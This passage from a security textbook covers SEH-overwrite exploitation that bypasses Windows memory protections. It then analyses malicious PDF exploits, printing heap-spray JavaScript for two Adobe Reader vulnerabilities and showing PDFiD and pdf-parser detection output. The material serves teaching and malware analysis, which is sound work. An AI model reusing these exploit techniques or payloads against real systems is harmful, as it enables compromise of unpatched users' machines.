hFile = f open (argv [ 1 ] , "wb" ) ; 
if (hFile) 

{ 

fwrite ( (void * ) ucBuf fer, 0x1000, 1 , hFile) ; 
fclose (hFile) ; 

printf ("Ok, you may attack with %s\n" , argv [ 1 ] ) ; 

} 

} 

} 
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Let's compile this program with the Visual Studio 2010 Express command-line 
tool (cl): 

cl sploit.c 

Then, run it to create the attack buffer: 

sploit.exe attack.bin 

And then feed it to OllyDbg and see what we get: 

C:\odbgllO\ollydbg sploit.exe attack.bin 




NOTE The offsets and size of the attack buffer took some trial and error, 
repeatedly launching in OllyDbg and testing until it was correct. 




After running the program in OllyDbg (using several buffer sizes and stack ad- 
dresses), we managed to build the exact SEH chain required. Notice that the first record 
points to the second, which contains the system exception handler address. Also notice 
the JMP short (EB) instructions to ride the NOP sled into the shellcode (below the final 
exception handler). 

Finally, notice that after the program crashes, we have controlled the SEH list (shown 
on the left in the OllyDbg screenshot) . 

Looks like we are ready to continue in the debugger or run the exploit without a 
debugger. 



View basic information about your computer 

Windows edition 

Window* 1 Protesoonsl 

Copyright C 2009 Microsoft Corporation. All right* reser 



Coni ml Penrl Hume 

tV Device Manager 
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Woot! We have done it. We have bypassed /GS, SafeSEH, and SEHOP as well. 
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Summary of Memory Bypass Methods 

As we have seen, there are many memory protections in recent Microsoft operating 
systems. However, there are many bypass methods as well. Shuichiro Suzuki (of Four- 
teenforty Research Institute, Inc.) did a great job of summarizing the differences in his 
presentation on the subject at the CanSecWest 2010 conference. We present the findings 
here, with his permission. 



Protections 


Windows XP SP3 


Windows Vista SPI 


Windows 7/2008 


IGS + SafeSEH 


Exploitable by using 
data area as an 
exception handler 


Exploitable by using 
data area as an 
exception handler 


Exploitable by using 
data area as an 
exception handler 


IGS + SafeSEH + 
Software DEP 


If all modules are 
SafeSEH protected 
it’s difficult to 
exploit 


If all modules are 
SafeSEH protected it’s 
difficult to exploit 


If all modules are 
SafeSEH protected 
it’s difficult to 
exploit 


/GS + Software DEP + 
Hardware DEP 


Exploitable by 
Return-into-libc or 
Return-oriented 
programming 


Exploitable by Return- 
into-libc or Return- 
oriented programming 


Exploitable by 
Return-into-libc or 
Return-oriented 
programming 


/GS + Software DEP + 
SEHOP 




Exploitable by 
re-creating proper 
SEH chain 


Exploitable by 
re-creating proper 
SEH chain 


/GS + SafeSEH + 
SEHOP 




Exploitable by 
re-creating proper 
SEH chain and using 
data area as an 
exception handler 


Exploitable by 
re-creating proper 
SEH chain and using 
data area as an 
exception handler 


IGS + Software DEP 
+ SEHOP + Hardware 
DEP 




Exploitable by 
re-creating proper 
SEH Chain and using 
data area and return- 
oriented programming 


Exploitable by 
re-creating proper 
SEH Chain and 
using data area and 
return-oriented 
programming 


/GS + SEHOP +ASLR 


- 


Difficult to exploit 


Difficult to exploit 


IGS + Software DEP 


- 


Difficult to exploit 


Difficult to exploit 



+ SEHOP + Hardware 
DEP+ASLR 
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"Exploit Writing Tutorial Part 6: Bypassing Stack Cookies, SafeSEH, SEHOP, 

EIW DEP and ASLR" (Peter Van Eeckhoutte) www.corelan.be:8800/index. 

php/2009/09/21/exploit-writing-tutorial-part-6-bypassing-stack-cookies-safeseh-hw- 

dep-and-aslr/ 

Exploit Writing Tutorial Part 10: Chaining DEP with ROP - the 
Rubik's[TM] Cube www.corelan.be:8800/index.php/2010/06/16/ 
exploit-writing-tutorial-part- 10-chaining-dep-with-rop-the-rubikstm-cube/ 

"Hacker Exploits IE8 on Windows 7 to Win Pwn20wn" (Ryan Naraine, reporting 
on Peter Vreugdenhil) www.zdnet.com/blog/security/ 
hacker-exploits-ie8-on-windows-7-to-win-pwn2 own/5855 
"Practical Return-Oriented Programming" (Dino Zia Zovi) 
trailofbits.files.wordpress.com/2010/04/practical-rop.pdf 

pvefindaddr tool and usage wiki redmine.corelan.be:8800/projects/pvefindaddr 
"Pwn20wn 2010 Windows 7 Internet Explorer 8 Exploit" 

(Peter Vreugdenhil) vreugdenhilresearch.nl/Pwn20wn-2010-Windows7- 
InternetExplorer8.pdf 

"Reducing the Effective Entropy of GS Cookies" (Matt Miller, aka skape) 

uninformed . org/ ?v= 7&a=2 

Shuichiro Suzuki's brief on bypassing SafeSEH http://twitter.com/jugglershu/ 
status/ 11692812477 
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CHAPTER 



_ 



Understanding and 
Detecting Content-Type 
Attacks 



Most enterprise network perimeters are protected by firewalls that block unsolicited 
network-based attacks. Most enterprise workstations have antivirus protection for 
widespread and well-known exploits. And most enterprise mail servers are protected 
by filtering software that strips malicious executables. In the face of these protections, 
malicious attackers have increasingly turned to exploiting vulnerabilities in client-side 
software such as Adobe Acrobat and Microsoft Office. If an attacker attaches a mali- 
cious PDF to an e-mail message, the network perimeter firewall will not block it, the 
workstation antivirus product likely will not detect it (see the "Obfuscation" section 
later in the chapter), the mail server will not strip it from the e-mail, and the victim 
may be tricked into opening the attachment via social engineering tactics. 

In this chapter, we cover the following topics: 

• How do content-type attacks work? 

• Which file formats are being exploited today? 

• Intro to the PDF file format 

• Analyzing a malicious PDF exploit 

• Tools to detect malicious PDF files 

• Tools to Test Your Protections Against Content-type Attacks 

• How to protect your environment from content-type attacks 

How Do Content-Type Attacks Work? 

The file format specifications of content file types such as PDF or DOC are long and 
involved (see the "References" section). Adobe Reader and Microsoft Office use thou- 
sands of lines of code to process even the simplest content file. Attackers attempt to 
exploit programming flaws in that code to induce memory corruption issues, resulting 
in their own attack code being run on the victim computer that opened the PDF or 
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DOC file. These malicious files are usually sent as an e-mail attachment to a victim. 
Victims often do not even recognize they have been attacked because attackers use 
clever social engineering tactics to trick the victim into opening the attachment, exploit 
the vulnerability, and then open a "clean document" that matches the context of the 
e-mail. Figure 16-1 provides a high-level picture of what malicious content-type attacks 
look like. 

This attack document is sent by an attacker to a victim, perhaps using a compro- 
mised machine to relay the e-mail to help conceal the attacker's identify. The e-mail 
arrives at the victim's e-mail server and pops up in their Inbox, just like any other e-mail 
message. If the victim double-clicks the file attached to the e-mail, the application reg- 
istered for the file type launches and begins parsing the file. In this malicious file, the 
attacker will have embedded malformed content that exploits a file-parsing vulnerabil- 
ity, causing the application to corrupt memory on the stack or heap. Successful exploits 
transfer control to the attacker's shellcode that has been loaded from the file into mem- 
ory. The shellcode often instructs the machine to write out an EXE file embedded at a 
fixed offset and run that executable. After the EXE file is written and run, the attacker's 
code writes out a "clean file" also contained in the attack document and opens the ap- 
plication with the content of that clean file. In the meantime, the malicious EXE file 
that has been written to the file system is run, carrying out whatever mission the at- 
tacker intended. 

Early content-type attacks from 2003 to 2005 often scoured the hard drive for inter- 
esting files and uploaded them to a machine controlled by the attacker. More recently, 
content- type attacks have been used to install generic Trojan horse software that "phones 
home" to the attacker's control server and can be instructed to do just about anything 
on the victim's computer. Figure 16-2 provides an overview of the content-type attack 
process. 



Document 



Loaded after 
successful 
exploitation 




Figure 16-1 Malicious content-type attack document 
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Figure 16-2 Content-type attack process 



References 

Microsoft Office file format specification msdn.microsoft.com/en-us/library/ 
cc313118.aspx 

PDF file format specification www.adobe.com/devnet/pdf/pdf_reference.html 

Which File Formats Are Being Exploited Today? 

Attackers are an indiscriminate bunch. They will attack any client-side software that is 
used by their intended victim if they can trick the victim into opening the file and can 
find an exploitable vulnerability in that application. Until recently, the most common- 
ly attacked content-type file formats have been Microsoft Office file formats (DOC, 
XLS, PPT). Figure 16-3 shows the distribution of attacks by client-side file format in 
2008 according to security vendor F-Secure. 

Microsoft invested a great deal of security hardening into its Office applications, 
releasing both Office 2007 and Office 2003 SP3 in 2007. Many companies have now 
rolled out those updated versions of the Office applications, making life significantly 
more difficult for attackers. F-Secure's 2009 report shows a different distribution of 
attacks, as shown in Figure 16-4. 

PDF is now the most commonly attacked content file type. It is also the file type 
having public proof-of-concept code to attack several recently patched issues, some as 
recent as October 2010 (likely the reason for its popularity among attackers). The 
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Figure 16-3 2008 targeted attack file format distribution (Courtesy of F-Secure) 



Microsoft Security Intelligence Report shows that most attacks on Office applications 
attempt to exploit vulnerabilities for which a security update has been released years 
earlier. (See the "Microsoft Security Intelligence Report" in the References below for 
more statistics around distribution of vulnerabilities used in Microsoft Office-based 
content- type attacks.) Therefore, we will spend most of this chapter discussing the PDF 
file format, tools to interpret the PDF file format, tools to detect malicious PDFs, and a 
tool to create sample attack PDFs. The "References" section at the end of each major 



Microsoft 




Figure 16-4 2009 targeted attack file format distribution (Courtesy of F-Secure) 
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section will include pointers to resources that describe the corresponding topics for the 
Microsoft Office file formats. 

References 

Microsoft Security Intelligence Report www.microsoft.com/security/sir 

"PDF Most Common File Type in Targeted Attacks" (F-Secure) www.f-secure.com/ 

weblog/ archives/00001 676.html 

Intro to the PDF File Format 

Adobe's PDF file format specification is a whopping 756 pages. The language to de- 
scribe a PDF file is based on the PostScript programming language. Thankfully, you do 
not need to understand all 756 pages of the file format specification to detect attacks or 
build proof-of-concept PDF files to replicate threats. The security research community, 
primarily a researcher named Didier Stevens, has written several great tools to help you 
understand the specification. However, a basic understanding of the structure of a PDF 
file is useful to understand the output of the tools. 

PDF files can be either binary or ASCII. We'll start by analyzing an ASCII file created 
by Didier Stevens that displays the text "Hello World": 

“Hello World” PDF file content listing 



%PDF-1 . 1 

1 0 obj 
« 

/Type /Catalog 
/Outlines 2 0 R 
/Pages 3 0 R 
» 

endobj 

2 0 obj 
« 

/Type /Outlines 
/Count 0 
» 

endobj 

3 0 obj 
« 

/Type /Pages 
/Kids [4 0 R] 

/Count 1 
» 

endobj 

4 0 obj 
« 

/Type /Page 
/Parent 3 0 R 
/MediaBox [0 0 612 792] 
/Contents 5 0 R 
/Resources 
« /ProcSet 6 0 R 

/Font « /FI 7 0 R » 

» 



» 
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endobj 

5 0 obj 

<< /Length 46 » 

stream 

BT 

/FI 24 Tf 
100 700 Td 
(Hello World) Tj 
ET 

endstream 

endobj 

6 0 obj 
/PDF /Text] 
endobj 

7 0 obj 

« 

/Type /Font 
/Subtype /Typel 
/Name /FI 

/BaseFont /Helvetica 
/Encoding /MacRomanEncoding 

» 

endobj 
xref 
0 8 

0000000000 65535 f 
0000000012 00000 n 
0000000089 00000 n 
0000000145 00000 n 
0000000214 00000 n 
0000000381 00000 n 
0000000485 00000 n 
0000000518 00000 n 
trailer 
« 

/Size 8 
/Root 1 0 R 
» 

startxref 
642 
% %E0F 

The file starts with a header containing the PDF language version, in this case 
version 1.1. The rest of this PDF file simply describes a series of "objects." Each object 
is in the following format: 



[index number] [version number] obj 
< 

(content) 

> 

endobj 



The first object in this file has an index number of 1 and a version number of 0. An 
object can refer to another object by using its index number and version number. For 
example, you can see from the preceding Hello World example listing that this first 
object (index number 1, version number 0) references other objects for "Outlines" and 
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"Pages." The PDF's "Outlines" begin in the object with index 2, version 0. The notation 
for that reference is "2 0 R" (R for reference). The PDF's "Pages" begin in the object with 
index 3, version 0. Scanning through the file, you can see references between several of 
the objects. You could build up a tree-like structure to visualize the relationships be- 
tween objects, as shown in Figure 16-5. 

Now that you understand how a PDF file is structured, we need to cover just a 
couple of other concepts before diving into malicious PDF file analysis. 

Object "5 0" in the previous PDF content listing is the first object that looks differ- 
ent from previous objects. It is a "stream" object. 

5 0 obj 

« /Length 46 » 

stream 

BT 

/FI 24 Tf 
100 700 Td 
(Hello World) Tj 
ET 

endstream 

endobj 



Stream objects may contain compressed, obfuscated binary data between the open- 
ing "stream" tag and closing "endstream" tag. Flere is an example: 

5 0 obj<</Subtype/TypelC/Length 5416/Filter/FlateDecode>>stream 
H% | T } T#W#Y ! d&"FI#A%NFW#aC 

endstream 

endobj 



Figure 16-5 

Graphical structure 
of “Hello World” 
PDF file 



(Root) 
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In this example, the stream data is compressed using the / Flate method of the zlib 
library (/Filter /FlateDecode). Compressed stream data is a popular trick used by 
malware authors to evade detection. We'll cover another trick later in the chapter. 



Reference 

Didier Stevens' PDF tools blog.didierstevens.com/programs/pdf-tools/ 



Analyzing a Malicious PDF Exploit 

Most PDF-based vulnerabilities in the wild exploit coding errors made by Adobe Reader's 
JavaScript engine. The first malicious sample we will analyze attempts to exploit CVE- 
2008-2992, a vulnerability in Adobe Reader 8.1.2's implementation of JavaScript's 
printf() function. The malicious PDF is shown here: 

Malicious PDF file content listing 

%PDF-1 . 1 

1 0 obj 
« 

/Type /Catalog 
/Outlines 2 0 R 
/Pages 3 0 R 
/OpenAction 7 0 R 
» 

endobj 

2 0 obj 
« 

/Type /Outlines 
/ Count 0 
» 

endobj 

3 0 obj 
« 

/Type /Pages 
/Kids [4 0 R] 

/ Count 1 
» 

endobj 

4 0 obj 
« 

/Type /Page 
/Parent 3 0 R 
/MediaBox [0 0 612 792] 

/Contents 5 0 R 
/Resources « 

/ProcSet [/PDF /Text] 

/Font « /FI 6 0 R » 

» 

» 

endobj 

5 0 obj 
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« /Length 56 » 
stream 

BT /FI 12 Tf 100 700 Td 15 TL (JavaScript example) Tj ET 

endstream 

endobj 

6 0 obj 

« 

/Type /Font 
/Subtype /Typel 
/Name /FI 

/BaseFont /Helvetica 
/Encoding /MacRomanEncoding 
» 

endobj 

7 0 obj 

« 

/Type /Action 
/S /JavaScript 

/JS (var shellcode = unescape ( M %u00E8%u0000%u5B00%uB38D%u01BB %u0000 . . . " ) ; 
var NOPs = unescape ( "%u9090 " ) ; 
while (NOPs. length < 0x60000) 

NOPs += NOPs; 
var blocks = new Array (); 
for (i = 0; i < 1200; i++) 
blocks [i] = NOPs + shellcode; 

var num = 12999999999999999999888888888888888888888888888888888888888888888888 



util .printf ( "%45000f " , num); 

) 

» 

endobj 
xref 
0 8 

0000000000 65535 f 
0000000012 00000 n 
0000000109 00000 n 
0000000165 00000 n 
0000000234 00000 n 
0000000439 00000 n 
0000000553 00000 n 
0000000677 00000 n 
trailer 
« 

/Size 8 
/Root 1 0 R 
» 

startxref 

3088 

%%EOF 

This PDF file is similar to the original clean PDF file we first analyzed. The first 
difference is the fourth line inside the brackets of object 1 0: 



/OpenAction 7 0 R 
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The OpenAction verb instructs Adobe Reader to execute JavaScript located in a 
certain object. In this case, the script is in indirect object 7 0. Within object 7 0, you see 
JavaScript to prepare memory with a series of NOPs and shellcode and then trigger the 
vulnerability: 

var num = 12999999999999999999888888 ; 

util .printf ("%45000f", num) ; 

The finder of this vulnerability, Core Security Technologies, posted a detailed advi- 
sory with more details (see the "References" section). In this plaintext, unobfuscated 
PDF sample, the analysis was easy. The /OpenAction keyword led directly to malicious 
JavaScript. Real-world exploits will not be human readable, so we'll need to use special- 
ized tools in our analysis. 

Implementing Safeguards in Your Analysis Environment 

As with traditional malware analysis, you should always change the file extension of 
potentially malicious samples. When handling malicious EXE samples, changing the file 
extension prevents accidental execution. It becomes even more important to do so when 
handling malicious PDF samples because your analysis environment may be configured 
to automatically process the malicious JavaScript in the sample. Didier Stevens posted 
research showing an Adobe Reader vulnerability being triggered via the Windows Ex- 
plorer thumbnail mechanism and also simply by being indexed by the Windows Search 
Indexer. You can find links to this research in the "References" section. 

Changing the file extension (from .pdf to .pdf.vir, for example) will prevent 
Windows Explorer from processing the file to extract metadata. To prevent the 
Search Indexer from processing the document, you'll need to unregister the PDF 
iFilter. You can read more about IFilters at http://msdn.microsoft.com/en-us/library/ 
ms692586%28VS.85%29.aspx. IFilters exist to extract chunks of text from complex file 
formats for search indexing. Adobe's iFilter implementation is installed with Adobe 
Reader and can be exploited when the Indexing Service attempts to extract text from the 
PDF file. To disable the Adobe iFilter, unregister it via the following command: 

regsvr32 /u AcroRdIf.dll 

References 

"Adobe Reader Javascript Printf Buffer Overflow" advisory (Core Security 
Technologies) www.coresecurity.com/ content/ adobe-reader-buffer-overflow 
"/JBIG2Decode 'Look Mommy, No Elands!'" (Didier Stevens) 
blog.didierstevens.com/2009/03/09/quickpost-jbig2decode-look-mommy-no-hands/ 
"/JBIG2Decode Trigger Trio" (Didier Stevens) 

blog.didierstevens.com/2009/03/04/quickpost-jbig2decode-trigger-trio/ 

Microsoft IFilter technology msdn.microsoft.com/en-us/library/ 
ms692586%28VS.85%29.aspx 
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Tools to Detect Malicious PDF Files 

This section presents two Python scripts that are helpful in detecting malicious PDF 
files. Both are written by Didier Stevens and are available as free downloads from http:// 
blog.didierstevens.com/programs/pdf-tools. The first script is pdfid.py (called PDFiD) 
and the second is pdf-parser.py. PDFiD is a lightweight, first-pass triage tool that can 
be used to get an idea of the "suspiciousness" of the file. You can then tun further 
analysis of suspicious files with pdf-parser.py. 



PDFiD 

PDFiD scans a file for certain keywords. It reports the count of each keyword in the file. 
Here is an example of running PDFiD against the malicious PDF file presented in the 
preceding section. 

PDFiD 0.0.10 testfile.pdf 
PDF Header: %PDF-1.1 



obj 7 
endobj 7 
stream 1 
endstream 1 
xref 1 
trailer 1 
startxref 1 
/Page 1 
/Encrypt 0 
/ObjStm 0 
/JS 1 
/JavaScript 1 
/AA 0 
/OpenAction 1 
/AcroForm 0 
/JB I G2 Decode 0 
/RichMedia 0 
/Colors > 2^24 0 



The most interesting keywords in this file are highlighted in bold for illustration. 
You can see that this malicious sample contains just one page (/Page =1), has JavaScript 
(/JS and /JavaScript), and has an automatic action (/OpenAction). That is the signature 
of the malicious PDF exploit. The most interesting other flags to look for are the fol- 
lowing: 



• /AA and /AcroForm (other automatic actions) 

• /JBIG2Decode and /Colors > 2 A 24 (vulnerable filters) 

• /RichMedia (embedded Flash) 

In addition to detecting interesting, potentially malicious keywords, PDFiD is a 
great tool for detecting PDF obfuscation and also for disarming malicious PDF 
samples. 
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Obfuscation 

Malware authors use various tricks to evade antivirus detection. One is to obfuscate us- 
ing hex code in place of characters. These two strings are equivalent to Adobe Reader: 



/OpenAction 7 0 R 
/0pen#41ction 7 0 R 

41 is the ASCII code for capital A. PDFiD is smart enough to convert hex codes to 
their ASCII equivalent and will report instances of keywords being obfuscated. With 
OpenAction replaced by Open#41ction in the test file, here's the PDFiD output: 

PDFiD 0.0.10 testfile.pdf 
PDF Header: %PDF-1.1 



obj 7 

endobj 7 

stream 1 

endstream 1 

xref 1 

trailer 1 

startxref 1 

/Page 1 

/Encrypt 0 

/ObjStm 0 

/JS 1 

/JavaScript 1 

/AA 0 

/OpenAction 1(1) 

/AcroForm 0 

/ JBIG2Decode 0 

/RichMedia 0 

/Colors > 2 A 24 0 



Notice that PDFiD still detects OpenAction and flags it as being obfuscated one time, 
indicated by (1). 



“Disarming” a Malicious PDF File 

While Adobe Reader does allow hex equivalents, it does not allow keywords to be of a 
different case than is in the specification. /JavaScript is a keyword indicating JavaScript 
is to follow, but /jAVAsCRIPT is not recognized as a keyword. Didier added a clever 
feature to "disarm" malicious PDF exploits by simply changing the case of dangerous 
keywords and leaving the rest of the PDF file as is. Flere is an example of disarm com- 
mand output: 

$ python pdfid.py --disarm testfile.pdf 
/Open# 4 let ion -> /oPEN#61CTION 
/JavaScript -> /jAVAsCRIPT 
/JS -> /js 

PDFiD 0.0.10 testfile.pdf 
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PDF Header: %PDF-1.1 



obj 7 

endobj 7 

stream 1 

endstream 1 

xref 1 

trailer 1 

startxref 1 

/Page 1 

/Encrypt 0 

/ObjStm 0 

/JS 1 

/JavaScript 1 

/AA 0 

/OpenAction 1(1) 

/AcroForm 0 

/JB I G2 Decode 0 

/RichMedia 0 

/Colors > 2 A 24 0 



$ diff testfile.pdf testfile.disarmed.pdf 
7c7 

< /Open#41ction 7 0 R 

> /oPEN#61CTION 7 0 R 
53, 54c53, 54 

< /S /JavaScript 

< /JS (var shellcode = unescape ("%u00E8%u0000%u5B00%uB38D%u01BB iuOOOO..."); 

> /S /jAVAsCRIPT 

> /js (var shellcode = unescape ("%u00E8%u0000%u5B00%uB38D%u01BB %u0000..."); 

We see here that a new PDF file was created, named testfile.disarmed.pdf, with the 
following three changes: 

• /Open#41ction was changed to /oPEN#61CTION 

• /JavaScript was changed to /jAVAsCRIPT 

• /JS was changed to /js 

No other content in the PDF file was changed. So now you could even (in most 
cases) safely open the malicious PDF in a vulnerable version of Adobe Reader if you 
needed to do so for your analysis. For example, if a malicious PDF file were to exploit a 
vulnerability in the PDF language while using JavaScript to prepare heap memory for 
exploitation, you could disarm the /OpenAction and /JavaScript flags but still trigger 
the vulnerability for analysis. 

For this simple proof-of-concept testfile.pdf, tools such as cat and grep would be 
sufficient to spot the vulnerability trigger and payload. However, remember that real- 
world exploits are binary, obfuscated, compressed, and jumbled up. Figure 16-6 shows 
a hex editor screenshot of a real, in-the-wild exploit. 



PART III 



Gray Hat Hacking, The Ethical Hacker's Handbook, Third Edition 

354 



Figure 16-6 

Hex view of real- 
world exploit 
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at this sample. We'll start 


with 


PDFiD for 


the initial triage: 



PDFiD 0.0.10 malwarel . pdf . vir 
PDF Header: %PDF-1.6 



obj 38 
endobj 38 
stream 13 
endstream 13 
xref 3 
trailer 3 
startxref 3 
/Page 1 
/Encrypt 0 
/ObjStm 0 
/JS 2 
/JavaScript 2 
/AA 1 
/OpenAction 0 
/AcroForm 2 
/ JBIG2Decode 0 
/RichMedia 0 
/Colors > 2 A 24 0 



The file contains a single page, has two blocks of JavaScript, and has three auto- 
matic action keywords (one /AA and two /AcroForm). It's probably malicious. But if we 
want to dig in deeper to discover, for example, which vulnerability is being exploited, 
we need another tool that can go deeper into the file format. 
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pdf-parser, py 

The author of PDFiD, Didier Stevens, has also released a tool to dig deeper into mali- 
cious PDF files, pdf-parser.py. In this section, we'll demonstrate three of the many use- 
ful functions of this tool: search, reference, and filter. 

Our goal is to conclusively identify whether this suspicious PDF file is indeed mali- 
cious. If possible, we'd also like to uncover which vulnerability is being exploited. We'll 
start by using pdf-parser's search function to find which indirect object(s) contains the 
likely-malicious JavaScript. You can see in the following command output that the 
search string is case insensitive. 

$ pdf-parser.py --search javascript malwarel . pdf . vir 
obj 31 0 
Type : 

Referencing: 32 0 R 

[(2, (2, ’/S'), (2, '/JavaScript'), (2, ' / JS ' ) , (1, ' '), 

(3, '32'), (1, ' '), (3, '0'), (1, 1 '), (3, 'R'), (2, '»'), (1, 

' \r ' ) ] 

« 

/S /JavaScript 
/JS 32 0 R 

» 

obj 31 0 
Type : 

Referencing: 34 0 R 

[(2, '«'), (2, '/S'), (2, '/JavaScript'), (2, ' / JS ' ) , (1, ' '), 

(3, '34'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (2, '»'), (1, 

' \r ' ) ] 

« 

/S /JavaScript 
/JS 34 0 R 

» 

We see two copies of indirect object 31 0 in this file, both containing the keyword 
/JavaScript. Multiple instances of the same index and version number means the PDF 
file contains incremental updates. You can read a humorous anecdote titled "Shoul- 
der Surfing a Malicious PDF Author" on Didier's blog at http://blog.didierstevens 
.com/2008/ll/10/shoulder-surfmg-a-malicious-pdf-author/. His "shoulder surfing" 
was enabled by following the incremental updates left in the file. In our case, we only 
care about the last update, the only one still active in the file. In this case, it is the 
second indirect object 31 0 containing the following content: 

« 

/S /JavaScript 
/JS 34 0 R 



» 
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It's likely that the malicious JavaScript is in indirect object 34 0. However, how did 
we get here? Which automatic action triggered indirect object 31 0's /JavaScript? We can 
find the answer to that question by finding the references to object 31. The -reference 
option is another excellent feature of pdf-parser. py: 

$ pdf-parser . py --reference 31 malwarel . pdf . vir 
obj 16 0 
Type: /Page 

Referencing: 17 0 R, 8 0 R, 27 0 R, 25 0 R, 31 0 R 

[(2, (2, '/CropBox'), (2, (3, ' 0 '), (1, 1 '), (3, 

'0'), (1, ' '), (3, '595'), (1, ' '), (3, '842'), (2, ']'), (2, 

'/Annots'), (1, ' '), (3, '17'), (1, ' '), (3, '0'), (1, ' '), (3, 

'R'), (2, '/Parent'), (1, 1 '), (3, '8'), (1, 1 '), (3, '0'), (1, 

' '), (3, 'R'), (2, ’/Contents'), (1, ' '), (3, '27'), (1, ’ '), 

(3, '0'), (1, ' '), (3, 'R'), (2, '/Rotate'), (1, ' '), (3, '0'), 

(2, ' /MediaBox' ) , (2, '['), (3, '0'), (1, 1 '), (3, '0'), (1, 1 

'), (3, '595'), (1, ' '), (3, '842'), (2, ']'), (2, '/Resources'), 

(1, ' '), (3, '25'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (2, 

'/Type'), (2, '/Page'), (2, '/AA'), (2, '«'), (2, '/O'), (1, ' 

'), (3, '31'), (1, ' '), (3, '0'), (1, ' '), (3, ' R ' ) , (2, '»'), 

(2, '»'), (1, ' \r ' ) ] 

« 

/CropBox [0 0 595 842] 

/Annots 17 0 R 
/Parent 8 0 R 
/Contents 27 0 R 
/Rotate 0 

/MediaBox [0 0 595 842] 

/Resources 25 0 R 
/Type /Page 
/AA /O 31 0 R 

» 



Indirect object 16 is the single "Page" object in the file and references indirect object 
31 via an annotation action (/AA). This triggers Adobe Reader to automatically process 
object 31, which causes Adobe Reader to automatically run the JavaScript contained in 
object 34. Let's take a look at object 34 to confirm our suspicion: 

$ pdf-parser . py --object 34 malwarel . pdf . vir 
obj 34 0 
Type : 

Referencing : 

Contains stream 

[(2, ’«’), (2, ’/Length’), (1, ’ (3, ’1164’), (2, 

’/Filter’), (2, ’[’), (2, ’ /FlateDecode ’ ) , (2, ’]’), (2, ’»’)] 

« 

/Length 1164 
/Filter [ 

/FlateDecode ] 

» 

Aha! Object 34 is a stream object, compressed with /Flate to hide the malicious 
JavaScript from antivirus detection, pdf-parser.py can decompress it with -filter: 

$ pdf-parser.py --object 34 --filter malwarel . pdf . vir 
obj 34 0 
Type : 

Referencing : 

Contains stream 
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[(2, '«'), (2 , '/Length'), (1, ' '), (3, '1164'), (2, 

'/Filter'), (2, '['), (2, ' /FlateDecode ' ) , (2, ']'), (2, '»')] 

« 

/Length 1164 
/Filter [ 

/FlateDecode ] 

» 

' \nfunction re (count, what) \r\n{\r\nvar v = "";\r\nwhile (--count 
>= 0) \r\nv += what ; \r\nreturn v;\r\n} \r\nfunction start () 

\r\n{\r\nsc = unescape ( "%u5850%u5850%uEB90 .. . 

We're getting closer. This looks like JavaScript. It would be easier to read with the 
carriage returns and newlines displayed instead of escaped. Pass -raw to pdf-parser.py: 

$ pdf-parser.py --object 34 --filter --raw malwarel . pdf . vir 
obj 34 0 
Type : 

Referencing : 

Contains stream 

<</ Length 1164/ Filter [ /FlateDecode] >> 

« 

/Length 1164 
/Filter [ 

/FlateDecode ] 

» 

function re (count, what) 

{ 

var v = 

while (--count >= 0) 
v += what; 
return v; 

} 

function start () 

{ 

sc = unescape ( "%u5850%u5850%uEB90 ; 
if (app . viewerVersion >= 7.0) 

{ 

plin = re (1124, unescape ( "%u0b0b%u002 8%u06eb%u06eb" ) ) + 
unescape ( "%u0b0b%u0028%u0aeb%u0aeb" ) + unescape ( "%u9090%u9090" ) + 
re ( 122 , unescape ( "%u0b0b%u0028%u06eb%u06eb" ) ) + sc + 
re ( 1256 , unescape ( "%u4 14 1%u4 14 1 " ) ) ; 

} 

else 

{ 

ef6 = unescape ( "%uf 6eb%uf 6eb" ) + unescape ("%u0b0b%u0019") ; 

plin = re (80, unescape ("%u9090%u9090") ) + sc + 

re (80, unescape ( "%u9090%u9090" ) ) + unescape ( "%ue7e9%uf f f 9" ) 

tunescape ("%uffff%uffff") + unescape ("%uf6eb%uf4eb") + 

unescape ( "%uf 2eb%uf leb" ) ; 

while ( (plin . length % 8) != 0) 

plin = unescape ( "%u4 14 1 " ) + plin; 

plin += re (2626, ef 6) ; 

} 

if (app . viewerVersion >= 6.0) 

{ 

this . collabStore = Collab . collectEmaillnfo ( { subj : "",msg: plin}); 

} 

} 

var shaft = app . setTimeOut ("start ()", 1200) ;QPplin; 
abStore = Coll 
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A quick Internet search reveals that Collab.collectEmaillnfo corresponds to Adobe 
Reader vulnerability CVE-2007-5659. Notice here that this exploit only attempts to ex- 
ploit CVE-2007-5659 if viewerVersion >= 6.0. The exploit also passes a different pay- 
load to version 6 and version 7 Adobe Reader clients. Finally the exploit introduces a 
1.2-second delay (app.setTimeOut("start()",1200)) to properly display the document 
content before memory-intensive heap spray begins. Perhaps unwitting victims are less 
likely to become suspicious if the document displays properly. 

From here, we could extract the shellcode (sc variable in the script) and analyze 
what malicious actions the attackers attempted to carry out. In this case, the shellcode 
downloaded a Trojan and executed it. 

Reference 

Didier Stevens' PDF tools blog.didierstevens.com/programs/pdf-tools/ 



Tools to Test Your Protections Against 
Content-type Attacks 

The Metasploit tool, covered in Chapter 8, can exploit a number of content-type vulner- 
abilities. Version 3.3.3 includes exploits for the following Adobe Reader CVEs: 

• CVE-2007-5659_Collab.collectEmailInfo() adobe_collectemailinfo.rb 

• CVE-2008-2992_util.printf() adobe_utilprintf.rb 

• CVE-2009-0658_JBIG2Decode adobe_jbig2decode.rb 

• CVE-2009-0927_Collab.getIcon() adobe_geticon.rb 

• CVE-2009-2994_CLODProgressiveMeshDeclaration adobe_u3d_meshdecl.rb 

• CVE-2009-3459_FlateDecode Stream Predictor adobe_flatedecode_ 
predictor02.rb 

• CVE-2009-4324_Doc.media.newPlayer adobe_media_newplayer.rb 

Didier Stevens has also released a simple tool to create PDFs containing auto-refer- 
enced JavaScript, make-pdf-javascript.py, by default, will create a one-page PDF file that 
displays a JavaScript "ffello from PDF JavaScript" message box. You can also use the -j 
and -f arguments to this Python script to include custom JavaScript on the command 
line (-j) or in a file (-f). One way to dig deep into the PDF file format is to use 
make-pdf-javascript.py as a base for creating custom proof-of-concept code for each of 
the PDF vulnerabilities in Metasploit. 

References 

CVE List search tool cve.mitre.org/cve/cve.html 

Didier Stevens' PDF tools blog.didierstevens.com/programs/pdf-tools/ 
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How to Protect Your Environment from 
Content-type Attacks 

You can do some simple things to prevent your organization from becoming a victim 
of content-type attacks. 

Apply All Security Updates 

Immediately applying all Microsoft Office and Adobe Reader security updates will 
block nearly all real-world content-type attacks. The vast majority of content-type at- 
tacks attempt to exploit already-patched vulnerabilities. Figure 16-7 is reproduced with 
permission from the Microsoft Security Intelligence Report. It shows the distribution of 
